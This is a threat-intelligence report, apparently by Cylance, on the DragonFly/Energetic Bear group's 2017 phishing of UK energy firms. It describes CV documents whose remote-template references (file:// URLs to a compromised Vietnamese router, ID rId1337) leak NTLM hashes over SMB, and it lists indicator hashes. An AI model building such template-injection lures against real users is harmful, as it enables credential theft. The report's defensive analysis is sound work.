Energetic DragonFly DYMALLOY Bear 2.0

Introduction

New research from Cylance identifies for the first time the use of a compromised core router as one of the tools wielded by the threat actor that has recently been accused by the United States government of acting in the interests of Russia to attack government agencies and organizations in the “energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.”

This is a discovery whose significance far outweighs its size, given that core router compromises are considerably harder to detect, analyze, patch, and remediate than compromises of PCs.

Background

On March 15, the U.S. government announced new sanctions against what it called “Russian cyber actors” for interference in the 2016 presidential election and the NotPetya attack. In the course of that announcement, the government alluded to the fact that “Russian government cyber actors have also targeted U.S. government entities and multiple U.S. critical infrastructure sectors,” including energy and nuclear power companies.

This constitutes the first time that the U.S. government has publicly attributed these attacks to the Russians. In the wake of this announcement, the FBI and DHS released the details in a new Joint Analysis report.

This marks the third time that the U.S. government has published such information. The first time was privately in June of 2017, and then it did so again in a broader public report released in October of 2017. While these government warnings are new, this threat actor (also known variously as DragonFly, Energetic Bear, Crouching Yeti, DYMALLOY, and Group 24) has been the subject of investigation and/or public reports by the security industry for years, including at Cylance.

After this threat actor’s operations were initially exposed in 2013 and 2014 in a series of widely discussed research reports that led to the different group names mentioned above, Cylance observed the actor go dark for a period of about a year, during which time we believe the group was actively retooling.

Then, in early 2015 – before U.S. nuclear and energy companies became a target – energy companies in other countries were similarly compromised, both in the nuclear and oil industries. It has already been reported that facilities in Ireland and Turkey were among those targeted.

Cylance research has uncovered additional targets from earlier periods, the most notable of which is a large mining and power company in Kazakhstan.

More recently, Cylance has discovered that a core Cisco router relied upon by one of Vietnam’s largest oil rig manufacturers was compromised by the same threat group in an endeavor to harvest credentials that were later used to attempt to penetrate a handful of energy companies in the UK around March of 2017.

Technical Findings

In mid-July of 2017, Motherboard published a news report it claimed was based on a leaked document from Britain’s National Cyber Security Centre, or NCSC. The NCSC is a division of the country’s signals intelligence agency, GCHQ.

According to Motherboard, the document contained an alert aimed at the country’s energy sector warning of “connections from multiple UK IP addresses to infrastructure associated with advanced state-sponsored hostile threat actors, who are known to target the energy and manufacturing sectors” which “likely” resulted in compromise, beginning in early June of 2017.

Motherboard paraphrased the technical details of the attack contained in the leaked document: “Specifically with the intrusions reported in the NCSC document, the infrastructure in organizations is connecting to a set of malicious IP addresses using SMB, a data transfer protocol, as well as HTTP. The report suggests that the hackers may be trying to capture victims' passwords, and provides a set of mitigations for victims, such as turning on multi-factor authentication for industrial systems.”

Cylance research supports this analysis and sheds new light on the campaign.

We observed a phishing operation which targeted energy sector organizations in the UK. The attacks began using two phishing documents in a manner similar to that in incidents on which previously reports have focused – all of which relied on the Redirect to SMB feature of Windows.

Cylance previously disclosed and analyzed this feature in a 2015 report (PDF): 

Following the modus operandi of previous attacks, both documents purported to be the Curriculum Vitae of a “Jacob Morrison.”  When an unsuspecting user opened one of the documents, it would fetch a remote template and attempt to automatically authenticate to the malicious SMB server at 123.30.96.18 by providing the victim's encrypted user credentials (NTLM v2 Hash).  All of this would occur surreptitiously without any kind of warning prompt.

Cylance found that the two separate documents called back to:

file://123.30.96.18/Noto.dotm; and

file://123.30.96.18/Table.dotm

The URL’s were contained within the file “word/_rels/settings.xml.rels” and they were referenced by the ID “rId1337.” A snippet is below:


Figure 1: Contents of settings.xml.rels

The continued use of this ID is strange as it could easily be modified and therefore likely bypass even more of the already limited antivirus detections.  The use of this ID was also previously linked to the Phishery Github project by Ryan Hanson and it was highlighted publicly by Cisco.

In contrast, the IP address “123.30.96.18” turned out to be quite interesting as it was an end-of-life Cisco Infrastructure Router belonging to a large state-owned Vietnamese energy conglomerate.

The threat actor used this core router to harvest the phished credentials that were later used to likely compromise energy sector targets in the UK.

The use of this compromised routing device for credential collection appears to have only been used by the attackers very briefly.

Conclusion

The use of compromised routing infrastructure for collection or command and control purposes is not new, but its detection is relatively rare. That’s because the compromise of a router very likely implicates the router’s firmware and there simply aren’t as many tools available to the forensic investigator to investigate them. Analysis is further challenged by the lack of system logs.

The fact that the threat actor is using this type of infrastructure is a serious and worrisome discovery, since once exploited, vulnerabilities in core infrastructure like routers are not easily closed or remediated.

While the end goals of these campaigns can only be speculated upon, their very existence across an array of power companies in several countries should be of great concern to governments, the companies themselves, and all those who rely upon their critical services.

Indicators of Compromise (IOC’s):

SHA256 Hashes:

9444b44eac0c8436039a2a4e8575d75f5b2d0d37361ace169b49f2149d1bfc48

e2c54649f090a9e8ca4ef3416e7bd5024fbc4c3b1ecc5cd7855afcd02f7a412a